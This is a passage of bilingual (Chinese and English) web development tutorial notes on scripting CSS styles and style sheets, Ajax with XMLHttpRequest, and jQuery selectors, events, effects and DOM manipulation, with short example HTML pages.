getComputedStyle和element.style的相同点是二者返回的都是CSSStyleDeclaration对象,取相应属性值的时候都采用CSS属性名的驼峰式写法。
而不同点就是:
• element.style读取的只是元素的“内联样式”,即写在元素的style属性上的样式;而getComputedStyle读取的样式是最终样式,包括了“内联样式”、“嵌入样式”和“外部样式”。
• element.style既支持读也支持写,我们通过element.style即可改写元素的样式。而getComputedStyle仅支持读并不支持写入。
我们可以通过使用getComputedStyle读取样式,通过element.style修改样式
脚本化CSS
在实际工作中,我们使用javascript操作CSS样式时,如果要改变大量样式,会使用脚本化CSS类的技术:
• style:我们在改变元素的少部分样式时,一般会直接改变其行间样式;
• cssText:改变元素的较多样式时,可以使用cssText
• css类:更常用的是使用css类,将更改前和更改后的样式提前设置为类名。只要更改其类名即可(参考3.2.3,Chap3-57);
• classList:如果要改变多个类名,使用classList更为方便(参考3.2.3,chap3-57)
<style>
.big{height: 100px;width: 100px;background-color: blue;}
.small{height: 50px;width: 50px;background-color: green;}
</style>
<div id="test" class="big" style="border: medium double black;font-size: 1em;color: white">hello world!</div>
var divTest=document.getElementById("test");
divTest.onclick=function () {
if(divTest.className=="big"){
divTest.className="small";
}else if(divTest.className=="small"){
divTest.className="big";
}
}
脚本化样式表
CSSStyleSheet类型表示的是样式表。我们知道,引入CSS一共有3种方式,包括行间样式、内部样式和外部样式。其中,内部样式和外部样式分别通过<style><link>标签以样式表的形式引入,属于CSSStyleSheet类型。
样式表CSSStyleSheet是通过document.styleSheets集合来表示的,它会返回一组对象集合,这些对象代表了与文档关联的各个样式表。
CSSStyleSheet对象成员 说明
cssRules 返回样式表的规则集合
deleteRule(pos) 从样式表中移除一条规则
disabled 获取或设置样式表的禁用状态
href 返回链接样式表的href
insertRule(rule,pos) 插入一条新规则到样式表中
media 返回应用到样式表上的媒介限制集合
ownerNode 返回定义此样式表的元素(style或link元素)
title 返回title属性的值
type 返回type属性的值
获得样式表的基本信息
Chap3-54.html
<head>
<meta charset="UTF-8">
<title>chap3-54</title>
<style title="S1">
p{border: double medium black;background-color: lightgray}
#block1{color: white}
table{border: thin solid black;border-collapse: collapse;margin: 5px;float: left}
td{padding: 2px}
</style>
<link rel="stylesheet" title="L1" type="text/css" href="css/styles.css">
<style title="S2" media="screen AND (min-width:500px)" type="text/css">
#block2{color: yellow;font-style: italic}
</style>
</head>
<body>
<p id="block1">There are lots of different kinds of fruit</p>
<p id="block2">One of the most interesting aspects of fruit is the variety available in each country.</p>
<div id="placeholder"></div>
<script>
var placeholder=document.getElementById("placeholder");
var sheets=document.styleSheets;
for(var i=0;i<sheets.length;i++){
var newElem=document.createElement("table");
newElem.setAttribute("border","1");
addRow(newElem,"Index",i);
addRow(newElem,"href",sheets[i].href);
addRow(newElem,"title",sheets[i].title);
addRow(newElem,"type",sheets[i].type);
addRow(newElem,"ownerNode",sheets[i].ownerNode.tagName);
placeholder.appendChild(newElem);
}
function addRow(elem,header,value) {
elem.innerHTML+="<tr><td>"+header+":</td><td>"+value+"</td></tr>";
}
</script>
</body>
styles.css
a{
background-color: grey;
color: white;
}
span{
border:thin black solid;
padding: 10px;
}
禁用样式表
CSSStyleSheet.disabled属性可用来一次性启用和禁用某个样式表里的所有样式。
Chap3-55.html
<head> <style>p{border: medium double black;background-color: lightgray;height: 40px}</style>
<style media="screen AND (min-width:500px)" type="text/css">
#block1{color: yellow;border: thin solid black;background-color: lightgreen} </style>
</head>
<body>
<p id="block1">There are lots of different kinds of fruit</p>
<div><button id="pressme">Press Me</button> </div>
<script>
document.getElementById("pressme").onclick=function () {
document.styleSheets[0].disabled=!document.styleSheets[0].disabled;
}
</script>
</body>
CSSRuleList对象
CSSStyleSheet.cssRules属性会返回一个CSSRuleList对象,它允许你访问样式表里的各种样式。样式表里的每一种CSS样式都有一个CSSStyleRule对象代表。
CSSRuleList对象成员 说明
item(pos) 返回指定索引的CSS样式
length 返回样式表里的样式数量
CSSStyleRule对象成员 说明
cssText 获取或设置样式的文本(包括选择器)
parentStyleSheet 获取此样式所属的样式表
selectorText 获取或设置样式的选择器文本
style 获取一个代表具体样式属性的对象
Chap3-56.html
<head> <style> p{border: double medium black;background-color: lightgray}
#block1{color: white;border: thick solid black;background-color: gray}
table{border: thin solid black;border-collapse: collapse;margin: 5px;float: left}
td{padding: 2px} </style>
</head>
<body>
<p id="block1">There are lots of different kinds of fruit</p>
<p id="block2">One of the most interesting aspects of fruit is the variety available in each country.</p>
<div><button id="pressme">Press Me</button> </div>
<div id="placeholder"></div>
<script>
var placeholder=document.getElementById("placeholder");
processStyleSheet();
document.getElementById("pressme").onclick=function () {
document.styleSheets[0].cssRules.item(1).selectorText="#block2";
if(placeholder.hasChildNodes()){
var childCount=placeholder.childNodes.length;
for(var i=0;i<childCount;i++){
placeholder.removeChild(placeholder.firstChild);
}
}
processStyleSheet();
}
function processStyleSheet() {
var rulesList=document.styleSheets[0].cssRules;
for(var i=0;i<rulesList.length;i++){
var rule=rulesList.item(i);
var newElem=document.createElement("table");
newElem.setAttribute("border","1");
addRow(newElem,"parentStyleSheet",rule.parentStyleSheet.title);
addRow(newElem,"selectorText",rule.selectorText);
addRow(newElem,"cssText",rule.cssText);
placeholder.appendChild(newElem);
}
}
function addRow(elem,header,value) {
elem.innerHTML+="<tr><td>"+header+":</td><td>"+value+"</td></tr>";
}
</script>
</body>
Scripting HTTP
The HyperText Transfer Protocol (HTTP) specifies how web browsers fetch documents from and submit form data to web servers, and how web servers respond to those requests and submissions.
Normally HTTP is not under the control of scripts; it happens only when the user clicks a link, submits a form, or types a URL. However, it is possible to drive HTTP from JavaScript: setting the window.location property or calling a form object's submit() method both initiate HTTP requests. In either case, the browser loads a new page.
Ajax describes a web application architecture that manipulates HTTP primarily through scripts. The defining feature of an Ajax application is that it uses scripts to exchange data with the web server over HTTP without causing a page reload.
A web application can use Ajax to record user interaction data on the server, or it can start by displaying a simple page and then load additional data and page components on demand to improve start-up time.
Getting Started with Ajax
The key to Ajax is the XMLHttpRequest object.
The first step is to create a new XMLHttpRequest object:
var httpRequest=new XMLHttpRequest();
The second step is to attach an event handler to the XMLHttpRequest object's readystatechange event. This event fires several times during the request to tell you how things are progressing. You can read the XMLHttpRequest.readyState property to determine which stage the request is in.
Value	Description
UNSENT	0	The XMLHttpRequest object has been created
OPENED	1	The open method has been called
HEADERS_RECEIVED	2	The response headers from the server have been received
LOADING	3	The server response is being received
DONE	4	The response has completed or failed; on success the HTTP status code is 200
The third step is to tell the XMLHttpRequest object what you want to do, for example by calling the open method to request a document:
httpRequest.open("GET","chap3-58.html");
The fourth step is to call the send method to send the request to the server:
httpRequest.send();
The XMLHttpRequest.responseText property can be used to obtain the data sent by the server, for example:
document.getElementById("results").innerHTML=httpRequest.responseText;
The responseText property returns a string representing the data retrieved from the server.
Chap3-61.html
<body>
<div>
<button>chap3-58.html</button>
<button>chap3-59.html</button>
<button>chap3-60.html</button>
</div>
<div id="results" style="border: dotted medium black">Press a button</div>
<script>
var buttons=document.getElementsByTagName("button");
for(var i=0;i<buttons.length;i++){
buttons[i].onclick=function (e) {
var httpRequest=new XMLHttpRequest();
httpRequest.onreadystatechange=function (e) {
if(e.target.readyState==XMLHttpRequest.DONE && e.target.status==200){
document.getElementById("results").innerHTML=e.target.responseText;
}
};
httpRequest.open("GET",e.target.innerHTML);
httpRequest.send();
}
}
</script>
</body>
Using Ajax Events
Event name	Description
abort	Fires when the request is aborted
error	Fires when the request fails
timeout	Fires if the request times out
readystatechange	Fires at the different stages of the request life cycle
loadstart	Fires when the request starts
progress	Fires to report the progress of the request
load	Fires when the request completes successfully
loadend	Fires when the request has finished, whether it succeeded or failed
All of these events except readystatechange are defined in Level 2 of the XMLHttpRequest specification. When dispatching them, the browser uses a regular Event object for the readystatechange event and a ProgressEvent object for the others.
Name	Description
lengthComputable	Returns true if the total length of the data stream can be computed
loaded	Returns the amount of data loaded so far
total	Returns the total amount of data available
Chap3-62.html
<div><button>chap3-57.html</button><button>chap3-58.html</button><button>chap3-59.html</button></div>
<table id="events" border="1"></table><div id="target">Press a button</div>
<script>
var tableElem=document.getElementById("events"),buttons=document.getElementsByTagName("button");
for(var i=0;i<buttons.length;i++){buttons[i].onclick=handleButtonPress;}
var httpRequest;
function handleButtonPress(e) {
clearEventDetails();
httpRequest=new XMLHttpRequest();
httpRequest.onreadystatechange=handleResponse;
httpRequest.onerror=handleError;
httpRequest.onload=handleLoad;
httpRequest.onloadend=handleLoadEnd;
httpRequest.onloadstart=handleLoadStart;
httpRequest.onprogress=handleProgress;
httpRequest.open("GET",e.target.innerHTML);
httpRequest.send();
}
function handleResponse(e) {
displayEventDetails("readystate("+httpRequest.readyState+")");
if(httpRequest.readyState==4&&httpRequest.status==200){
document.getElementById("target").innerHTML=httpRequest.responseText;
}
}
function handleError(e) {displayEventDetails("error",e);}
function handleLoad(e) {displayEventDetails("load",e);}
function handleLoadEnd(e) {displayEventDetails("loadend",e);}
function handleLoadStart(e) {displayEventDetails("loadstart",e);}
function handleProgress(e) {displayEventDetails("progress",e);}
function clearEventDetails() { tableElem.innerHTML="<tr><th>Event</th><th>lengthComputable</th><th>loaded</th><th>total</th></tr>"
}
function displayEventDetails(eventName,e) {
if(e){ tableElem.innerHTML+="<tr><td>"+eventName+"</td><td>"+e.lengthComputable+"</td><td>"+e.loaded+"</td><td>"+e.total+"</td></tr>";
}else {
tableElem.innerHTML+="<tr><td>"+eventName+"</td><td>NA</td><td>NA</td><td>NA</td></tr>"
}
}
</script>
jQuery
jQuery is a JavaScript library that greatly simplifies JavaScript programming and is easy to learn. The jQuery library includes the following features:
• HTML element selection and manipulation
• CSS manipulation
• HTML event functions
• JavaScript effects and animations
• HTML DOM traversal and modification
• AJAX
Two versions of jQuery are available for download: one minified, the other uncompressed (for debugging or reading). Both can be downloaded from jQuery.com.
To use jQuery, include it in the page where you want it, using an HTML <script> tag:
<script src="jquery.js"></script>
jQuery syntax is built around selecting HTML elements and performing some action on them. The basic syntax is:
$(selector).action()
• The dollar sign defines jQuery
• The selector "queries" and "finds" HTML elements
• The jQuery action() performs an operation on the elements
$(this).hide()    // hides the current element
$("p").hide()     // hides all <p> elements
$(".test").hide() // hides all elements with class="test"
$("#test").hide() // hides the element with id="test"
CSS Selectors
jQuery has three basic kinds of selector:
Selector	CSS	jQuery	Description
Tag name	p	$('p')	Gets all paragraphs in the document
ID	#some-id	$('#some-id')	Gets the single element whose ID is some-id
Class	.some-class	$('.some-class')	Gets all elements whose class is some-class
When you use $(document).ready() in jQuery, all of the code inside it runs as soon as the DOM has loaded.
Chap3-63.html
<head><script src="js/jquery-3.3.1.js"></script>
<style>.horizontal{float: left;list-style: none;margin: 10px}
.subLevel{background-color: lightgray}
ul{font-size: x-large}
</style></head>
<body><p><ul id="selected">
<li>Fruits<ul><li>apple</li><li>banana</li><li>orange</li><li>pear</li></ul></li>
<li>Vegetables<ul><li>cabbage</li><li>tomato</li><li>potato</li><li>lettuce</li></ul></li>
<li>Meat<ul><li>pork</li><li>beef</li><li>chicken</li><li>lamb</li></ul></li>
</ul></p>
<p><button id="horizontal-level">Horizontal CSS</button><button id="sub-level">Sub-level CSS</button></p>
<script>
$(document).ready(function () {
$("#horizontal-level").click(function () {
$('#selected>li').addClass('horizontal');
});
$("#sub-level").click(function () {
$("#selected li:not(.horizontal)").addClass("subLevel");
});
})
</script>
</body>
Attribute Selectors
jQuery also supports attribute selectors; see the CSS attribute selector details in Chapter 2.
For example, to select all image elements that have an alt attribute: $("img[alt]")
To select anchor elements whose href attribute starts with mailto: $("a[href^='mailto:']")
To select all links to PDF files: $("a[href$='.pdf']")
Custom Selectors
In addition to the various CSS selectors, jQuery adds its own completely different custom selectors:
Selector	Example	Description
:first	$("p:first")	The first <p> element
:last	$("p:last")	The last <p> element
:even	$("tr:even")	All even-numbered <tr> elements
:odd	$("tr:odd")	All odd-numbered <tr> elements
:eq(index)	$("ul li:eq(3)")	The fourth element in the list (index starts at 0)
:gt(no)	$("ul li:gt(3)")	List elements with an index greater than 3
:lt(no)	$("ul li:lt(3)")	List elements with an index less than 3
:not(selector)	$("input:not(:empty)")	All non-empty input elements
:header	$(":header")	All heading elements <h1>-<h6>
:contains(text)	$(":contains('W3School')")	All elements containing the given string
:empty	$(":empty")	All elements with no child (element) nodes
:hidden	$("p:hidden")	All hidden <p> elements
:visible	$("table:visible")	All visible tables
Chap3-64.html
<head><script src="js/jquery-3.3.1.js"></script>
<style> tr{background-color: lightgray} .even{background-color: lightgreen}
.first{font-weight: bolder} .last{font-style: italic}
.eq0{color: red} .gt4{color: red} .contain{text-align: center}
</style></head>
<body>
<table width="300px">
<tr><td>Fruits</td><td>Color</td></tr><tr><td>apple</td><td>red</td></tr>
<tr><td>banana</td><td>yellow</td></tr><tr><td>pear</td><td>yellow</td></tr>
<tr><td>plum</td><td>purple</td></tr><tr><td colspan="2">My favorite fruits</td></tr>
</table>
<script>
$(document).ready(function () {
$("tr:even").addClass("even");
$("tr:first").addClass("first");
$("tr:last").addClass("last");
$("tr:eq(0)").addClass("eq0");
$("tr:gt(4)").addClass("gt4");
$("tr:contains('yellow')").addClass("contain");
});
</script>
</body>
When working with forms, jQuery's custom selectors also simplify selecting elements:
Selector	Example	Description
:input	$(":input")	All <input> elements
:text	$(":text")	All <input> elements with type="text"
:password	$(":password")	All <input> elements with type="password"
:radio	$(":radio")	All <input> elements with type="radio"
:checkbox	$(":checkbox")	All <input> elements with type="checkbox"
:submit	$(":submit")	All <input> elements with type="submit"
:reset	$(":reset")	All <input> elements with type="reset"
:button	$(":button")	All <input> elements with type="button"
:image	$(":image")	All <input> elements with type="image"
:file	$(":file")	All <input> elements with type="file"
:enabled	$(":enabled")	All enabled input elements
:disabled	$(":disabled")	All disabled input elements
:selected	$(":selected")	All selected input elements
:checked	$(":checked")	All checked input elements
Chap3-65.html
<head><script src="js/jquery-3.3.1.js"></script>
<style> .s1{display: inline-block;width: 80px;height:40px;font-size: x-large}
.s2{display: inline-block;width: 200px;height:40px;font-size: x-large}
</style></head>
<body>
<pre>
<span class="s1">用户名:</span><span class="s2"><input type="text"></span>
<span class="s1">密码:</span><span class="s2"><input type="password"></span>
<span class="s1">性别:</span><span class="s2"><input type="radio" name="sex" checked>男 <input type="radio" name="sex">女</span>
<button>加边框</button>
</pre>
<script>
$(document).ready(function () {
$(":text").css("background-color","lightgray");
$(":password").css("color","red");
$(":button").click(function () {
$(":checked").css("outline","dotted medium green");
});
});
</script>
</body>
Events
Event method	Description
$(document).ready(function)	Binds a function to the document's ready event (when the document has finished loading)
$(selector).click(function)	Triggers, or binds a function to, the click event of the selected elements
$(selector).dblclick(function)	Triggers, or binds a function to, the double-click event of the selected elements
$(selector).focus(function)	Triggers, or binds a function to, the focus event of the selected elements
$(selector).mouseover(function)	Triggers, or binds a function to, the mouseover event of the selected elements
$(selector).mouseleave(function)	Triggers, or binds a function to, the mouseleave event of the selected elements
$(selector).change(function)	Triggers, or binds a function to, the change event of the selected elements
$(selector).keydown(function)	Triggers, or binds a function to, the keydown event of the selected elements
$(selector).keyup(function)	Triggers, or binds a function to, the keyup event of the selected elements
Chap3-66.html
<head><script src="js/jquery-3.3.1.js"></script>
<style>.s1{display: inline-block;width: 80px;height:40px;font-size: x-large}
.s2{display: inline-block;width: 200px;height:40px;font-size: x-large}
.outline{outline: medium dotted green}</style></head>
<body>
<pre>
<span class="s1">用户名:</span><span class="s2"><input type="text"></span>
<span class="s1">密码:</span><span class="s2"><input type="password"></span>
<span class="s1">性别:</span><span class="s2"><input type="radio" name="sex" checked>男 <input type="radio" name="sex">女</span>
</pre>
<script>
$(document).ready(function () {
$(":text").keydown(function () {$(this).css("background-color","lightgreen");});
$(":text").keyup(function () {$(this).css("background-color","lightgray");});
$(":password").dblclick(function () {$(this).hide();});
$(":radio").mousemove(function () {$(this).addClass("outline");});
$(":radio").mouseleave(function () {$(this).removeClass("outline");});
});
</script>
Effects
Method	Description
animate()	Runs a custom animation on the selected elements
clearQueue()	Removes all queued functions (those not yet run) for the selected elements
delay()	Sets a delay for all queued functions (not yet run) on the selected elements
dequeue()	Runs the next queued function for the selected elements
fadeIn()	Gradually changes the opacity of the selected elements from hidden to visible
fadeOut()	Gradually changes the opacity of the selected elements from visible to hidden
fadeTo()	Gradually changes the selected elements to a given opacity
hide()	Hides the selected elements
queue()	Shows the queued functions for the selected elements
show()	Shows the selected elements
slideDown()	Reveals the selected elements with a sliding motion by adjusting their height
slideToggle()	Toggles between sliding the selected elements up (hidden) and down (shown)
slideUp()	Hides the selected elements with a sliding motion by adjusting their height
stop()	Stops an animation running on the selected elements
toggle()	Toggles between hiding and showing the selected elements
• The animate() method runs a custom animation over a set of CSS properties. It moves an element from one state to another by changing CSS style values, and because the values change gradually, an animation effect is created.
Syntax: $(selector).animate(styles,speed,easing,callback)
Parameter	Description
styles	Required. The CSS properties and values to animate. Possible CSS properties: backgroundPosition, borderWidth, borderBottomWidth, borderLeftWidth, borderRightWidth, borderTopWidth, borderSpacing, margin, marginBottom, marginLeft, marginRight, marginTop, outlineWidth, padding, paddingBottom, paddingLeft, paddingRight, paddingTop, height, width, maxHeight, maxWidth, minHeight, minWidth, font, fontSize, bottom, left, right, top, letterSpacing, wordSpacing, lineHeight, textIndent
speed	Optional. The speed of the animation. Default is normal. Possible values: milliseconds (e.g. 1500), slow, normal, fast
easing	Optional. The easing function that sets the animation speed at different points of the animation. Built-in easing functions: swing, linear
callback	Optional. A function to run after the animate function completes.
Note: only numeric values can be animated (e.g. margin:30px). String values cannot be animated (e.g. background-color:red).
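The reason only numeric values animate can be sketched in a few lines of plain JavaScript (this is an illustration, not jQuery's actual implementation): animating a property means interpolating between a start and an end number over time, and a string value like "red" has no numeric midpoint.

```javascript
// Minimal sketch of linear interpolation, the core of any tween:
// progress runs from 0 (start of the animation) to 1 (end).
function tween(from, to, progress) {
  return from + (to - from) * progress;
}

// Interpolating height from 100px to 300px at the halfway point gives 200px.
const midHeight = tween(100, 300, 0.5);
```

An easing function such as swing simply reshapes the progress value before it reaches this interpolation step.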
• The delay() method sets a delay for all queued functions (not yet run) on the selected elements. It does not stop an animation that is already running; the current animation finishes, then the delay elapses, then the next animation runs. It is typically used between two jQuery effect functions in a queue, so that after one effect finishes there is a pause of the specified length before the next one starts.
Syntax: $(selector).delay(duration,[queueName])
Parameter	Description
duration	The delay, in milliseconds
queueName	The queue name; the default is fx, the animation queue.
• The queue() method shows or manipulates the queue of functions to be executed on the matched elements. A queue is one or more functions waiting to run. queue() is normally used together with dequeue().
Syntax: $(selector).queue(queueName)
• The dequeue() method executes the next function in the queue for the matched elements. When .dequeue() is called, the next function is removed from the queue and then executed. That function should in turn (directly or indirectly) cause .dequeue() to be called, so that the sequence can continue.
Syntax: $(selector).dequeue(queueName)
Note: when adding a function with .queue(), make sure .dequeue() is eventually called so that the next queued function can run.
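The queue/dequeue contract can be sketched in plain JavaScript (illustrative only, not jQuery's real internals): queued functions wait in an array, and each one is handed a continuation it must call so the following queued function can run.

```javascript
// A minimal effects-queue sketch. Each queued function receives a
// "next" callback; forgetting to call it stalls the queue, which is
// exactly the pitfall the note above warns about.
const queue = [];
const ran = [];

function enqueue(fn) {
  queue.push(fn);
}

function dequeue() {
  const next = queue.shift(); // take the next waiting function
  if (next) next(dequeue);    // run it, passing dequeue to continue the chain
}

enqueue(function (next) { ran.push("first"); next(); });
enqueue(function (next) { ran.push("second"); next(); });

dequeue(); // runs "first", whose next() call runs "second"
```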
Chap3-68.html
<body>
<button id="start">开始动画</button><button id="stop">停止动画</button>
<div style="background-color: green;height: 100px;width: 100px;position: absolute"></div>
<script>
$(document).ready(function () {
var div=$("div");
$("#start").click(function () {
div.animate({height:"300px",opacity:"0.4"},"slow");
div.animate({width:"300px",opacity:"0.8"},"slow");
div.queue(function () {
div.css("background-color","red");
div.dequeue();
})
div.animate({height:"100px",opacity:"0.4"},"slow");
div.animate({width:"100px",opacity:"0.8"},"slow");
div.delay(1000).animate({width:"500px",opacity:"0.4"});
});
$("#stop").click(function () {
div.clearQueue();
});
});
</script>
</body>
• The fadeIn() method shows the selected elements with a fading effect, if they are hidden.
Syntax: $(selector).fadeIn(speed,callback)
Parameter	Description
speed	Optional. The speed of the transition from hidden to visible. Default is normal. Possible values: milliseconds (e.g. 1500), slow, normal, fast. When a speed is set, the element's opacity changes gradually as it goes from hidden to visible (creating the fade-in effect).
callback	Optional. A function to run after fadeIn completes. It cannot be set unless the speed parameter is also set.
• The fadeOut() method hides the selected elements with a fading effect, if they are visible.
Syntax: $(selector).fadeOut(speed,callback)
• The fadeTo() method gradually changes the opacity of the selected elements to the specified value.
Syntax: $(selector).fadeTo(speed,opacity,callback)
Parameter	Description
opacity	Required. The opacity to fade to. Must be a number between 0.00 and 1.00.
Chap3-68.html
<button id="fadeout">淡出</button><button id="fadein">淡入</button>
<button id="fadeto">改变透明度</button>
<div style="background-color: green;height: 100px;width: 100px;position: absolute"></div>
<script>
$(document).ready(function () {
var div=$("div");
$("#fadein").click(function () {
div.fadeIn(1000,function () {
alert("fadeIn()方法已完成!");
});
});
$("#fadeout").click(function () {
div.fadeOut(1000,function () {
alert("fadeOut()方法已完成!");
});
});
$("#fadeto").click(function () {
div.fadeTo(2000,0.4,function () {
alert("fadeTo()方法已完成!");
});
});
});
</script>
• The hide() method hides the selected elements if they are shown.
Syntax: $(selector).hide(speed,callback)
• The show() method shows the selected elements if they are hidden.
Syntax: $(selector).show(speed,callback)
• The slideDown() method shows the hidden selected elements with a sliding effect.
Syntax: $(selector).slideDown(speed,callback)
• The slideUp() method hides the selected elements with a sliding effect, if they are shown.
Syntax: $(selector).slideUp(speed,callback)
• The slideToggle() method toggles the visibility of elements with a sliding (height-changing) effect: visible elements are hidden, and hidden elements are shown.
Syntax: $(selector).slideToggle(speed,callback)
Chap3-68.html
<button id="hide">隐藏</button><button id="show">显示</button><button id="slidedown">Slide Down</button> <button id="slideup">Slide Up</button><button id="slidetoggle">Slide Toggle</button>
<div style="background-color: green;height: 100px;width: 100px;position: absolute"></div>
$(document).ready(function () {
var div=$("div");
$("#hide").click(function () {
div.hide(1000);
});
$("#show").click(function () {
div.show(1000,function () {
div.css("background-color","blue");
});
});
$("#slidedown").click(function () {
div.slideDown(1000);
});
$("#slideup").click(function () {
div.slideUp(1000);
});
$("#slidetoggle").click(function () {
div.slideToggle(1000);
});
});
Document Manipulation
Method	Description
addClass()	Adds the specified class name(s) to the matched elements.
after()	Inserts content after the matched elements.
append()	Inserts the content specified by the parameter at the end of each element in the matched set.
appendTo()	Inserts every element in the matched set at the end of the target.
attr()	Sets or returns attributes and values of the matched elements.
before()	Inserts content before each matched element.
clone()	Creates a copy of the matched set of elements.
detach()	Removes the matched set of elements from the DOM.
empty()	Removes all child nodes of the matched set of elements.
hasClass()	Checks whether the matched elements have the specified class.
html()	Sets or returns the HTML content of the matched set of elements.
insertAfter()	Inserts the matched elements after another specified set of elements.
insertBefore()	Inserts the matched elements before another specified set of elements.
prepend()	Inserts the content specified by the parameter at the beginning of each element in the matched set.
prependTo()	Inserts every element in the matched set at the beginning of the target.
remove()	Removes all matched elements.
removeAttr()	Removes the specified attribute from all matched elements.
removeClass()	Removes all, or the specified, classes from all matched elements.
replaceAll()	Replaces the target elements with the matched elements.
replaceWith()	Replaces the matched elements with new content.
text()	Sets or returns the text content of the matched elements.
toggleClass()	Adds or removes a class from the matched elements.
unwrap()	Removes the parent element of the specified elements.
val()	Sets or returns the value of the matched elements.
wrap()	Wraps each matched element in the specified content or element.
wrapAll()	Wraps all matched elements together in the specified content or element.
wrapInner()	Wraps the child content of every matched element in the specified content or element.
• The addClass() method adds one or more classes to the selected elements. It does not remove existing class attributes; it only adds one or more class names.
Syntax: $(selector).addClass(class)
• The hasClass() method checks whether the selected elements have the specified class.
Syntax: $(selector).hasClass(class)
• The removeClass() method removes one or more classes from the selected elements. If no parameter is given, the method removes all classes from the selected elements.
Syntax: $(selector).removeClass(class)
• The toggleClass() method toggles one or more classes on the selected elements, adding or removing them.
Syntax: $(selector).toggleClass(class,switch)
Parameter	Description
switch	Optional. A Boolean value specifying whether the class should be added or removed.
Chap3-69.html
<head><script src="js/jquery-3.3.1.js"></script>
<style>
.intro{font-size: x-large;color: blue} .note{background-color: yellow} .main{color:red}
</style>
</head>
<body>
<h1>This is a heading</h1><p>This is a paragraph.</p><p>This is another paragraph.</p>
<button id="btn1">向第一个 p 元素添加两个类</button><button id="btn2">改变第一个段落的类</button>
<button id="btn3">切换段落的 "main" 类</button>
<script>
$(document).ready(function(){
  $("#btn1").click(function(){
    $("p:first").addClass("intro note");
  });
  $("#btn2").click(function(){
    $("p:first").removeClass("intro").addClass("main");
  });
  $("#btn3").click(function(){
    $("p:first").toggleClass("main");
  });
});
</script>
• The after() method inserts the specified content after the selected elements.
Syntax: $(selector).after(content)
• The append() method inserts the specified content at the end of the selected elements (still inside them).
Syntax: $(selector).append(content)
• The appendTo() method inserts the specified content at the end of the selected elements (still inside them); the content to insert must contain HTML tags.
Syntax: $(content).appendTo(selector)
• The before() method inserts the specified content before the selected elements.
Syntax: $(selector).before(content)
• The prepend() method inserts the specified content at the beginning of the selected elements (still inside them).
Syntax: $(selector).prepend(content)
• The prependTo() method inserts the specified content at the beginning of the selected elements (still inside them); the content to insert must contain HTML tags.
Syntax: $(content).prependTo(selector)
• The insertBefore() method inserts HTML markup or existing elements before the selected elements; the content to insert must contain HTML tags.
Syntax: $(content).insertBefore(selector)
• The insertAfter() method inserts HTML markup or existing elements after the selected elements; the content to insert must contain HTML tags.
Syntax: $(content).insertAfter(selector)
Chap3-69.html
<button id="btn4">after插入内容</button>
<button id="btn5">append插入内容</button>
<button id="btn6">appendTo插入内容</button>
<button id="btn7">before插入内容</button>
<button id="btn8">prepend插入内容</button>
<button id="btn9">prependTo插入内容</button>
<button id="btn10">insertBefore插入内容</button>
<button id="btn11">insertAfter插入内容</button>
<script>
$(document).ready(function(){
$("#btn4").click(function(){$("p:first").after("Hello World!"); });
$("#btn5").click(function(){$("p:eq(1)").append("Hello World!"); });
$("#btn6").click(function(){$("<b> Hello World!</b>").appendTo("p:eq(1)");});
$("#btn7").click(function(){$("p:first").before("Hello World!");});
$("#btn8").click(function(){$("p:eq(1)").prepend("Hello World!");});
$("#btn9").click(function(){$("<b> Hello World!</b>").prependTo("p:eq(1)");});
$("#btn10").click(function(){$("<b> 你好!</b>").insertBefore("p:eq(1)");});
$("#btn11").click(function(){$("<b> 你好!</b>").insertAfter("p:eq(1)");});
});
</script>
• The attr() method sets or returns attributes and values of the selected elements. When used to return an attribute value, it returns the value from the first matched element. When used to set attribute values, it sets one or more attribute/value pairs on the matched elements.
• Return the value of an attribute: $(selector).attr(attribute)
• Set an attribute and value: $(selector).attr(attribute,value)
• Set an attribute and value using a function: $(selector).attr(attribute,function(index,currentvalue))
• Set multiple attributes and values: $(selector).attr({attribute:value, attribute:value,...})
Parameter	Description
attribute	The name of the attribute.
value	The value of the attribute.
function(index,currentvalue)	A function that returns the attribute value to set: index receives the element's index position in the set; currentvalue receives the element's current attribute value.
Chap3-69.html
<p><img src="pic/apple.jpg" alt="red apple" width="284" height="213"></p>
<button id="btn12">返回图片的宽度</button>
<button id="btn13">图像宽度减少50 px</button>
<button id="btn14">给图片设置宽度和高度属性</button>
<script>
$(document).ready(function(){
$("#btn12").click(function(){alert("图片宽度: " + $("img").attr("width"));});
$("#btn13").click(function(){
$("img").attr("width",function (n,v) {
return v-50;
})
});
$("#btn14").click(function(){$("img").attr({width:"150",height:"100"});});
});
</script>
• The removeAttr() method removes one or more attributes from the selected elements.
Syntax: $(selector).removeAttr(attribute)
• The html() method sets or returns the content (innerHTML) of the selected elements. When used to return content, it returns the content of the first matched element. When used to set content, it overwrites the content of all matched elements.
• Return content: $(selector).html()
• Set content: $(selector).html(content)
• Set content using a function: $(selector).html(function(index,currentcontent))
• The text() method sets or returns the text content of the selected elements. When used to return content, it returns the text content of all matched elements (HTML markup is removed). When used to set content, it overwrites the content of all matched elements.
• Return text content: $(selector).text()
• Set text content: $(selector).text(content)
• Set text content using a function: $(selector).text(function(index,currentcontent))
Chap3-69.html
<p class="main note">这是<b>另一个</b>段落。</p>
<button id="btn15">删除所有 p 元素的 class 属性</button>
<button id="btn16">html()修改第四个段落的内容</button>
<button id="btn17">text()修改第四个段落的内容</button>
<script>
$(document).ready(function(){
$("#btn15").click(function(){$("p").removeAttr("class");});
$("#btn16").click(function(){
$("p").html(function(n){
if(n===3){return $(this).html()+"这个P元素的索引位置为: " + n;}
});
});
$("#btn17").click(function(){
$("p:eq(3)").text(function(n){return $(this).text();});
});
});
</script>
• The val() method returns or sets the value attribute of the selected elements. When returning a value, it returns the value attribute of the first matched element. When setting a value, it sets the value attribute of all matched elements.
• Return the value attribute: $(selector).val()
• Set the value attribute: $(selector).val(value)
• Set the value attribute using a function: $(selector).val(function(index,currentvalue))
• The replaceWith() and replaceAll() methods replace the selected elements with the specified HTML content or elements. They differ in syntax (the positions of content and selector are swapped) and in that replaceWith() can use a function to perform the replacement.
Syntax:
$(selector).replaceWith(content)
$(content).replaceAll(selector)
• The wrap() method wraps each selected element in the specified HTML content or element.
Syntax: $(selector).wrap(wrappingElement,function(index))
Parameter	Description
wrappingElement	Required. The HTML element to wrap around each selected element. Possible values: an HTML element, a jQuery object, a DOM element
function(index)	Optional. A function that returns the wrapping element. index: the element's index position in the set.
• The unwrap() method removes the parent element of the selected elements.
Syntax: $(selector).unwrap()
Chap3-69.html
<style> div{border: medium dotted black;width: 800px} </style>
<p>姓名: <input type="text" name="fname" value="Peter"></p>
<button id="btn18">返回第一个输入字段的值</button>
<button id="btn19">设置姓名的值</button>
<button id="btn20">替换每个P元素</button>
